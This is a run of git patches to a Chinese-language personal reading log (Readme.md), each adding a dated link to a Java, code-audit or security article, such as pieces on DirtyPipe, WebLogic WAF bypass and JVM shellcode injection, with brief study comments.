[溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** + 2022/12/28 [Android 远程攻击面——WebView 
攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** ++ 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** From 915aa84993cf6fa5b3aa5a9818e93b468b7b008f Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 00:20:16 +0800 Subject: [PATCH 162/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 49fb0c7..603f323 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -232,3 +232,6 @@ + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** + 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** + +## 2023 ++ 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** From 7f0ca5f8a3fb33ddf178cf4032d9cf6e75eb3044 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 00:22:21 +0800 Subject: [PATCH 163/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 603f323..a28942e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -232,6 +232,7 @@ + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** + 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** ++ 2022/12/31 嗯其实没有看什么文章主要是在写代码,还是假装记录一下。新年快乐!!! ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** From 8e0db0695dc943634bea02e9063ed249f550d5c0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 19:07:54 +0800 Subject: [PATCH 164/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a28942e..db8701a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -236,3 +236,4 @@ ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** ++ 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** From 3c6df7884f3ddf7dfccc922265c17a8e53725064 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 4 Jan 2023 15:37:54 +0800 Subject: [PATCH 165/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index db8701a..dd3a96a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -237,3 +237,4 @@ ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** ++ 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** From 027907f5030360b5a5931aa76146f86673d4b566 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 12:58:13 +0800 Subject: [PATCH 166/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dd3a96a..6abcd75 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -238,3 +238,4 @@ + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** ++ 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 4ffc6062320dfec42e32b3cd4c2085057a8da64c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 15:36:02 +0800 Subject: [PATCH 167/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6abcd75..b00662c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -239,3 +239,4 @@ + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) From 3447aabfc31e1387637e5714a78ba6d6921f1fc6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 22:06:36 +0800 Subject: [PATCH 168/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b00662c..5eac817 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -240,3 +240,4 @@ + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) ++ 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** From a47eca2bf38bf0fe3859626c0d1b6aa69d0a8986 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 Jan 2023 19:25:40 +0800 Subject: [PATCH 169/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5eac817..42c3703 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -241,3 +241,4 @@ + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** ++ 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** 
From 492fea085d8fc25314e9f6842c0b06defb20156f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 Jan 2023 19:31:44 +0800 Subject: [PATCH 170/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 42c3703..92a0bac 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -242,3 +242,4 @@ + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** ++ 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** From 7b5746db08c0ff9e249a5211751cc8a0ddd137d5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 13:07:24 +0800 Subject: [PATCH 171/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 92a0bac..c244a14 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -243,3 +243,4 @@ + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** ++ 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** From 48388de1dd14e9ed247b7479091471ab5a2ffdb3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 15:00:27 +0800 Subject: [PATCH 172/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c244a14..2db8cc4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -244,3 +244,4 @@ + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** ++ 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** From 29282c0611bcaac3f9a68f98850115175f842c82 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 19:57:19 +0800 Subject: [PATCH 173/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2db8cc4..55dbdf9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -245,3 +245,4 @@ + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** ++ 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** From ca66b589a30f06cee34ec0dac038910dfaf92ca7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 11 Jan 2023 13:33:12 +0800 Subject: [PATCH 174/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 55dbdf9..bf7acba 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -246,3 +246,4 @@ + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) From 9593ba940a081aaeec14cea2c7063106a0f5e9e7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 11 Jan 2023 13:36:36 +0800 Subject: [PATCH 175/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bf7acba..1d481af 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -246,4 +246,4 @@ + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** -+ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) From 79776e236d7469e433b800ec4169ed1815ccb570 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 13 Jan 2023 20:45:41 +0800 Subject: [PATCH 176/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1d481af..5cd40c4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -247,3 +247,4 @@ + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) ++ 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** From d26fd31e43c6986fb6450f6e247b21cff20efcd1 Mon Sep 17 00:00:00 2001 
